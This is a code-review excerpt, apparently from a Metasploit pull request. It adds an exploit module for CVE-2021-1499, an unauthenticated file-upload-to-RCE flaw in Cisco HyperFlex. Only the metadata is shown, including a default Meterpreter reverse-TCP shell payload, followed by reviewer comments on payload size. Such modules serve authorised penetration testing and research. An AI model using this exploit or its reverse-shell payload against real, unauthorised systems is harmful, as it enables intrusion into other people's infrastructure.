modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

```diff
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload vulnerability in
+          Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
+          execute a payload as the Tomcat user.
+        },
+        'Author' => [
+          'Nikita Abramov',      # Discovery
+          'Mikhail Klyuchnikov', # Discovery
+          'wvu',                 # Research and guidance
+          'jheysel-r7'           # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-1499'], # HyperFlex HX File Upload
+          ['URL', 'https://attackerkb.com/assessments/82738621-1114-4aba-990a-9ea007b05834']
+        ],
+        'DisclosureDate' => '2021-05-05',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        # 'Arch' => [ARCH_CMD, ARCH_JAVA],
+        'Privileged' => false, # Privesc left as an exercise for the reader
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
+                'WfsDelay' => 10
```

Comment:
Cause and effect? Stageless is _big_.

Reply:
This was an oversight on my part, although when trying to switch to a staged payload I wasn't receiving a shell. I'll investigate further if we decide to stick with the `linux/x64/meterpreter`